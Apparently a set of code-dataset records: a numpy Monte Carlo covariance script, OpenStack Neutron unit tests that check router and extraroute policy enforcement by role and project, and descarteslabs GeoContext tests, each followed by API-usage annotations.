QuestionnaireResponse.document['identifier']['value'])\n", (3223, 3338), False, 'from portal.database import db\n')]
|
import numpy as np
def realization(p_1, p_2, n_trials):
p_3 = 1.0 - p_1 - p_2
outcomes = np.random.random(n_trials)
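    # Partition the uniform draws into three outcome categories with
    # probabilities p_1, p_2 and p_3 = 1 - p_1 - p_2 (thresholds at p_1
    # and p_1 + p_2).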
ii_1 = outcomes<=p_1
ii_2 = (outcomes>p_1) & (outcomes<=(p_1+p_2))
ii_3 = (~ii_1) & (~ii_2)
outcomes[ii_1] = 1
outcomes[ii_2] = 2
outcomes[ii_3] = 3
N_1 = len(outcomes[outcomes==1])
N_2 = len(outcomes[outcomes==2])
return N_1, N_2
def joint_probability(p_1, p_2, n_trials, n_iteraciones):
proba = np.zeros([n_trials+1, n_trials+1])
for i in range(n_iteraciones):
N_1, N_2 = realization(p_1, p_2, n_trials)
proba[N_1, N_2] += 1
proba /= n_iteraciones
return proba
def covarianza(p_1, p_2, n_total):
p = joint_probability(p_1, p_2, n_total, 100000)
    # expected value of N1*N2
E_N1_N2 = 0.0
for i in range(n_total+1):
for j in range(n_total+1):
E_N1_N2 += p[i,j] * i * j
    # expected value of N1
E_N1 = 0.0
for i in range(n_total+1):
p_i = 0.0
for j in range(n_total+1):
p_i += p[i,j]
E_N1 += p_i * i
    # expected value of N2
E_N2 = 0.0
for j in range(n_total+1):
p_j = 0.0
for i in range(n_total+1):
p_j += p[i,j]
E_N2 += p_j * j
return E_N1_N2 - E_N1 * E_N2
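# Usage sketch (not part of the original sample): for a multinomial with
# n_total trials, the analytic covariance is Cov(N_1, N_2) = -n_total * p_1 * p_2,
# so the Monte Carlo estimate below should land near -10 * 0.2 * 0.3 = -0.6.
if __name__ == "__main__":
    print(covarianza(0.2, 0.3, 10))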
|
[
"numpy.random.random",
"numpy.zeros"
] |
[((99, 125), 'numpy.random.random', 'np.random.random', (['n_trials'], {}), '(n_trials)\n', (115, 125), True, 'import numpy as np\n'), ((468, 506), 'numpy.zeros', 'np.zeros', (['[n_trials + 1, n_trials + 1]'], {}), '([n_trials + 1, n_trials + 1])\n', (476, 506), True, 'import numpy as np\n')]
|
# Copyright (c) 2021 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_policy import policy as base_policy
from oslo_utils import uuidutils
from neutron import policy
from neutron.tests.unit.conf.policies import test_base as base
class RouterAPITestCase(base.PolicyBaseTestCase):
def setUp(self):
super(RouterAPITestCase, self).setUp()
self.target = {'project_id': self.project_id}
self.alt_target = {'project_id': self.alt_project_id}
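        # `target` belongs to the test's own project, while `alt_target`
        # belongs to a different project and exercises cross-project checks.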
class SystemAdminTests(RouterAPITestCase):
def setUp(self):
super(SystemAdminTests, self).setUp()
self.context = self.system_admin_ctx
def test_create_router(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router', self.alt_target)
def test_create_router_distributed(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:distributed', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:distributed', self.alt_target)
def test_create_router_ha(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:ha', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:ha', self.alt_target)
def test_create_router_external_gateway_info(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info',
self.alt_target)
def test_create_router_external_gateway_info_network_id(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info:network_id',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info:network_id',
self.alt_target)
def test_create_router_external_gateway_info_enable_snat(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info:enable_snat',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'create_router:external_gateway_info:enable_snat',
self.alt_target)
def test_create_router_external_gateway_info_external_fixed_ips(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.alt_target)
def test_get_router(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router', self.alt_target)
def test_get_router_distributed(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router:distributed', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router:distributed', self.alt_target)
def test_get_router_ha(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router:ha', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'get_router:ha', self.alt_target)
def test_update_router(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router', self.alt_target)
def test_update_router_distributed(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:distributed', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:distributed', self.alt_target)
def test_update_router_ha(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:ha', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:ha', self.alt_target)
def test_update_router_external_gateway_info(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info',
self.alt_target)
def test_update_router_external_gateway_info_network_id(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info:network_id',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info:network_id',
self.alt_target)
def test_update_router_external_gateway_info_enable_snat(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info:enable_snat',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'update_router:external_gateway_info:enable_snat',
self.alt_target)
def test_update_router_external_gateway_info_external_fixed_ips(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.alt_target)
def test_delete_router(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'delete_router', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'delete_router', self.alt_target)
def test_add_router_interface(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'add_router_interface', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'add_router_interface', self.alt_target)
def test_remove_router_interface(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'remove_router_interface', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'remove_router_interface', self.alt_target)
class SystemMemberTests(SystemAdminTests):
def setUp(self):
super(SystemMemberTests, self).setUp()
self.context = self.system_member_ctx
class SystemReaderTests(SystemMemberTests):
def setUp(self):
super(SystemReaderTests, self).setUp()
self.context = self.system_reader_ctx
class ProjectAdminTests(RouterAPITestCase):
def setUp(self):
super(ProjectAdminTests, self).setUp()
self.context = self.project_admin_ctx
def test_create_router(self):
self.assertTrue(
policy.enforce(self.context, 'create_router', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router', self.alt_target)
def test_create_router_distributed(self):
self.assertTrue(
policy.enforce(
self.context, 'create_router:distributed', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:distributed', self.alt_target)
def test_create_router_ha(self):
self.assertTrue(
policy.enforce(self.context, 'create_router:ha', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:ha', self.alt_target)
def test_create_router_external_gateway_info(self):
self.assertTrue(
policy.enforce(self.context,
'create_router:external_gateway_info',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info',
self.alt_target)
def test_create_router_external_gateway_info_network_id(self):
self.assertTrue(
policy.enforce(self.context,
'create_router:external_gateway_info:network_id',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:network_id',
self.alt_target)
def test_create_router_external_gateway_info_enable_snat(self):
self.assertTrue(
policy.enforce(self.context,
'create_router:external_gateway_info:enable_snat',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:enable_snat',
self.alt_target)
def test_create_router_external_gateway_info_external_fixed_ips(self):
self.assertTrue(
policy.enforce(
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.alt_target)
def test_get_router(self):
self.assertTrue(
policy.enforce(self.context, 'get_router', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router', self.alt_target)
def test_get_router_distributed(self):
self.assertTrue(
policy.enforce(
self.context, 'get_router:distributed', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:distributed', self.alt_target)
def test_get_router_ha(self):
self.assertTrue(
policy.enforce(self.context, 'get_router:ha', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:ha', self.alt_target)
def test_update_router(self):
self.assertTrue(
policy.enforce(self.context, 'update_router', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router', self.alt_target)
def test_update_router_distributed(self):
self.assertTrue(
policy.enforce(
self.context, 'update_router:distributed', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:distributed', self.alt_target)
def test_update_router_ha(self):
self.assertTrue(
policy.enforce(self.context, 'update_router:ha', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:ha', self.alt_target)
def test_update_router_external_gateway_info(self):
self.assertTrue(
policy.enforce(self.context,
'update_router:external_gateway_info',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info',
self.alt_target)
def test_update_router_external_gateway_info_network_id(self):
self.assertTrue(
policy.enforce(self.context,
'update_router:external_gateway_info:network_id',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:network_id',
self.alt_target)
def test_update_router_external_gateway_info_enable_snat(self):
self.assertTrue(
policy.enforce(self.context,
'update_router:external_gateway_info:enable_snat',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:enable_snat',
self.alt_target)
def test_update_router_external_gateway_info_external_fixed_ips(self):
self.assertTrue(
policy.enforce(
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.alt_target)
def test_delete_router(self):
self.assertTrue(
policy.enforce(self.context, 'delete_router', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'delete_router', self.alt_target)
def test_add_router_interface(self):
self.assertTrue(
policy.enforce(self.context,
'add_router_interface', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'add_router_interface', self.alt_target)
def test_remove_router_interface(self):
self.assertTrue(
policy.enforce(self.context,
'remove_router_interface', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_router_interface', self.alt_target)
class ProjectMemberTests(ProjectAdminTests):
def setUp(self):
super(ProjectMemberTests, self).setUp()
self.context = self.project_member_ctx
def test_create_router_distributed(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:distributed', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:distributed', self.alt_target)
def test_create_router_ha(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:ha', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:ha', self.alt_target)
def test_create_router_external_gateway_info_enable_snat(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:enable_snat',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:enable_snat',
self.alt_target)
def test_create_router_external_gateway_info_external_fixed_ips(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.alt_target)
def test_get_router_distributed(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:distributed', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:distributed', self.alt_target)
def test_get_router_ha(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:ha', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:ha', self.alt_target)
def test_update_router_distributed(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:distributed', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:distributed', self.alt_target)
def test_update_router_ha(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:ha', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:ha', self.alt_target)
def test_update_router_external_gateway_info_enable_snat(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:enable_snat',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:enable_snat',
self.alt_target)
def test_update_router_external_gateway_info_external_fixed_ips(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.alt_target)
class ProjectReaderTests(ProjectMemberTests):
def setUp(self):
        super(ProjectReaderTests, self).setUp()
self.context = self.project_reader_ctx
def test_create_router(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router', self.alt_target)
def test_create_router_external_gateway_info(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info',
self.alt_target)
def test_create_router_external_gateway_info_network_id(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:network_id',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:network_id',
self.alt_target)
def test_update_router(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router', self.alt_target)
def test_update_router_external_gateway_info(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info',
self.alt_target)
def test_update_router_external_gateway_info_network_id(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:network_id',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:network_id',
self.alt_target)
def test_delete_router(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'delete_router', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'delete_router', self.alt_target)
def test_add_router_interface(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'add_router_interface', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'add_router_interface', self.alt_target)
def test_remove_router_interface(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_router_interface', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_router_interface', self.alt_target)
class ExtrarouteAPITestCase(base.PolicyBaseTestCase):
def setUp(self):
super(ExtrarouteAPITestCase, self).setUp()
self.router = {
'id': uuidutils.generate_uuid(),
'project_id': self.project_id}
self.target = {
'project_id': self.project_id,
'router_id': self.router['id'],
'ext_parent_router_id': self.router['id']}
self.alt_target = {
'project_id': self.alt_project_id,
'router_id': self.router['id'],
'ext_parent_router_id': self.router['id']}
class SystemAdminExtrarouteTests(ExtrarouteAPITestCase):
def setUp(self):
super(SystemAdminExtrarouteTests, self).setUp()
self.context = self.system_admin_ctx
def test_add_extraroute(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'add_extraroutes', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'add_extraroutes', self.alt_target)
def test_remove_extraroute(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'remove_extraroutes', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'remove_extraroutes', self.alt_target)
class SystemMemberExtrarouteTests(SystemAdminExtrarouteTests):
def setUp(self):
super(SystemMemberExtrarouteTests, self).setUp()
self.context = self.system_member_ctx
class SystemReaderExtrarouteTests(SystemMemberExtrarouteTests):
def setUp(self):
super(SystemReaderExtrarouteTests, self).setUp()
self.context = self.system_reader_ctx
class ProjectAdminExtrarouteTests(ExtrarouteAPITestCase):
def setUp(self):
super(ProjectAdminExtrarouteTests, self).setUp()
self.context = self.project_admin_ctx
def test_add_extraroute(self):
self.assertTrue(
policy.enforce(self.context, 'add_extraroutes', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
            self.context, 'add_extraroutes', self.alt_target)
def test_remove_extraroute(self):
self.assertTrue(
policy.enforce(self.context, 'remove_extraroutes', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_extraroutes', self.alt_target)
class ProjectMemberExtrarouteTests(ProjectAdminExtrarouteTests):
def setUp(self):
super(ProjectMemberExtrarouteTests, self).setUp()
self.context = self.project_member_ctx
class ProjectReaderExtrarouteTests(ProjectMemberExtrarouteTests):
def setUp(self):
super(ProjectReaderExtrarouteTests, self).setUp()
self.context = self.project_reader_ctx
def test_add_extraroute(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'add_extraroutes', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'add_extraroutes', self.alt_target)
def test_remove_extraroute(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_extraroutes', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_extraroutes', self.alt_target)
|
[
"oslo_utils.uuidutils.generate_uuid",
"neutron.policy.enforce"
] |
[((9620, 9678), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router"""', 'self.target'], {}), "(self.context, 'create_router', self.target)\n", (9634, 9678), False, 'from neutron import policy\n'), ((9924, 9994), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:distributed"""', 'self.target'], {}), "(self.context, 'create_router:distributed', self.target)\n", (9938, 9994), False, 'from neutron import policy\n'), ((10260, 10321), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:ha"""', 'self.target'], {}), "(self.context, 'create_router:ha', self.target)\n", (10274, 10321), False, 'from neutron import policy\n'), ((10580, 10665), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:external_gateway_info"""', 'self.target'], {}), "(self.context, 'create_router:external_gateway_info', self.target\n )\n", (10594, 10665), False, 'from neutron import policy\n'), ((11015, 11110), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:external_gateway_info:network_id"""', 'self.target'], {}), "(self.context,\n 'create_router:external_gateway_info:network_id', self.target)\n", (11029, 11110), False, 'from neutron import policy\n'), ((11473, 11569), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:external_gateway_info:enable_snat"""', 'self.target'], {}), "(self.context,\n 'create_router:external_gateway_info:enable_snat', self.target)\n", (11487, 11569), False, 'from neutron import policy\n'), ((11940, 12043), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:external_gateway_info:external_fixed_ips"""', 'self.target'], {}), "(self.context,\n 'create_router:external_gateway_info:external_fixed_ips', self.target)\n", (11954, 12043), False, 'from neutron import policy\n'), ((12384, 12439), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""get_router"""', 'self.target'], {}), "(self.context, 'get_router', self.target)\n", (12398, 12439), False, 'from neutron import policy\n'), ((12679, 12746), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""get_router:distributed"""', 'self.target'], {}), "(self.context, 'get_router:distributed', self.target)\n", (12693, 12746), False, 'from neutron import policy\n'), ((13006, 13064), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""get_router:ha"""', 'self.target'], {}), "(self.context, 'get_router:ha', self.target)\n", (13020, 13064), False, 'from neutron import policy\n'), ((13298, 13356), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router"""', 'self.target'], {}), "(self.context, 'update_router', self.target)\n", (13312, 13356), False, 'from neutron import policy\n'), ((13602, 13672), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:distributed"""', 'self.target'], {}), "(self.context, 'update_router:distributed', self.target)\n", (13616, 13672), False, 'from neutron import policy\n'), ((13938, 13999), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:ha"""', 'self.target'], {}), "(self.context, 'update_router:ha', self.target)\n", (13952, 13999), False, 'from neutron import policy\n'), ((14258, 14343), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:external_gateway_info"""', 'self.target'], {}), "(self.context, 'update_router:external_gateway_info', self.target\n )\n", (14272, 14343), False, 
'from neutron import policy\n'), ((14693, 14788), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:external_gateway_info:network_id"""', 'self.target'], {}), "(self.context,\n 'update_router:external_gateway_info:network_id', self.target)\n", (14707, 14788), False, 'from neutron import policy\n'), ((15151, 15247), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:external_gateway_info:enable_snat"""', 'self.target'], {}), "(self.context,\n 'update_router:external_gateway_info:enable_snat', self.target)\n", (15165, 15247), False, 'from neutron import policy\n'), ((15618, 15721), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:external_gateway_info:external_fixed_ips"""', 'self.target'], {}), "(self.context,\n 'update_router:external_gateway_info:external_fixed_ips', self.target)\n", (15632, 15721), False, 'from neutron import policy\n'), ((16065, 16123), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""delete_router"""', 'self.target'], {}), "(self.context, 'delete_router', self.target)\n", (16079, 16123), False, 'from neutron import policy\n'), ((16364, 16429), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""add_router_interface"""', 'self.target'], {}), "(self.context, 'add_router_interface', self.target)\n", (16378, 16429), False, 'from neutron import policy\n'), ((16707, 16775), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""remove_router_interface"""', 'self.target'], {}), "(self.context, 'remove_router_interface', self.target)\n", (16721, 16775), False, 'from neutron import policy\n'), ((25331, 25356), 'oslo_utils.uuidutils.generate_uuid', 'uuidutils.generate_uuid', ([], {}), '()\n', (25354, 25356), False, 'from oslo_utils import uuidutils\n'), ((27256, 27316), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""add_extraroutes"""', 'self.target'], {}), "(self.context, 'add_extraroutes', self.target)\n", (27270, 27316), False, 'from neutron import policy\n'), ((27559, 27622), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""remove_extraroutes"""', 'self.target'], {}), "(self.context, 'remove_extraroutes', self.target)\n", (27573, 27622), False, 'from neutron import policy\n')]
|
import pytest
import shapely.geometry
from descarteslabs import scenes
from .. import GeoContext
from descarteslabs.workflows.types.containers import Tuple
from descarteslabs.workflows.types.primitives import Int, Float
def test_from_scenes_wrong_type():
with pytest.raises(
TypeError, match=r"expected a `descarteslabs\.scenes\.GeoContext`"
):
GeoContext.from_scenes("foo")
def test_from_scenes_aoi():
aoi = scenes.AOI(
geometry=shapely.geometry.box(-60.0, 30.0, -50.0, 40.0),
resolution=1,
crs="EPSG:4326",
align_pixels=False,
)
ctx = GeoContext.from_scenes(aoi)
assert ctx.graft[ctx.graft["returns"]][0] == "wf.GeoContext.create"
promoted = GeoContext._promote(aoi)
assert promoted.graft[promoted.graft["returns"]][0] == "wf.GeoContext.create"
def test_from_scenes_tile():
tile_dict = {
"geometry": {
"coordinates": [
[
[-100.10534464886125, 59.94175277369993],
[-99.91065247366876, 59.943240309707676],
[-99.91334037259435, 60.040922421458546],
[-100.10860694364838, 60.039429047992876],
[-100.10534464886125, 59.94175277369993],
]
],
"type": "Polygon",
},
"properties": {
"cs_code": "EPSG:32614",
"geotrans": [438240.0, 20.0, 0, 6656320.0, 0, -20.0],
"key": "512:16:20.0:14:-6:649",
"outputBounds": [438240.0, 6645440.0, 449120.0, 6656320.0],
"pad": 16,
"proj4": "+proj=utm +zone=14 +datum=WGS84 +units=m +no_defs ",
"resolution": 20.0,
"ti": -6,
"tilesize": 512,
"tj": 649,
"zone": 14,
},
"type": "Feature",
}
tile = scenes.DLTile(tile_dict)
ctx = GeoContext.from_scenes(tile)
assert ctx.graft[ctx.graft["returns"]][0] == "wf.GeoContext.from_dltile_key"
promoted = GeoContext._promote(tile)
assert (
promoted.graft[promoted.graft["returns"]][0] == "wf.GeoContext.from_dltile_key"
)
def test_from_scenes_xyztile():
tile = scenes.XYZTile(3, 5, 4)
ctx = GeoContext.from_scenes(tile)
assert ctx.graft[ctx.graft["returns"]][0] == "wf.GeoContext.from_xyz_tile"
promoted = GeoContext._promote(tile)
assert promoted.graft[promoted.graft["returns"]][0] == "wf.GeoContext.from_xyz_tile"
def test_promote_dltile_from_key():
ctx = GeoContext.from_dltile_key("500:0:10.0:13:-17:790")
assert GeoContext._promote(ctx) is ctx
def test_promote_xyztile_from_xyz():
ctx = GeoContext.from_xyz_tile(3, 5, 4)
assert GeoContext._promote(ctx) is ctx
@pytest.mark.parametrize("attr", ["arr_shape", "gdal_geotrans", "projected_bounds"])
def test_readonly_attributes(attr):
type_params = GeoContext._type_params[0]
ctx = GeoContext.from_xyz_tile(3, 5, 4)
assert isinstance(getattr(ctx, attr), type_params[attr])
def test_index_to_coords():
aoi = scenes.AOI(
geometry=shapely.geometry.box(-60.0, 30.0, -50.0, 40.0),
resolution=1,
crs="EPSG:4326",
align_pixels=False,
)
ctx = GeoContext.from_scenes(aoi)
coords = ctx.index_to_coords(0, 0)
assert isinstance(coords, Tuple[Float, Float])
def test_coords_to_index():
aoi = scenes.AOI(
geometry=shapely.geometry.box(-60.0, 30.0, -50.0, 40.0),
resolution=1,
crs="EPSG:4326",
align_pixels=False,
)
ctx = GeoContext.from_scenes(aoi)
ctx = GeoContext._promote(ctx)
index = ctx.coords_to_index(0.0, 1.0)
assert isinstance(index, Tuple[Int, Int])
|
[
"pytest.raises",
"pytest.mark.parametrize",
"descarteslabs.scenes.DLTile",
"descarteslabs.scenes.XYZTile"
] |
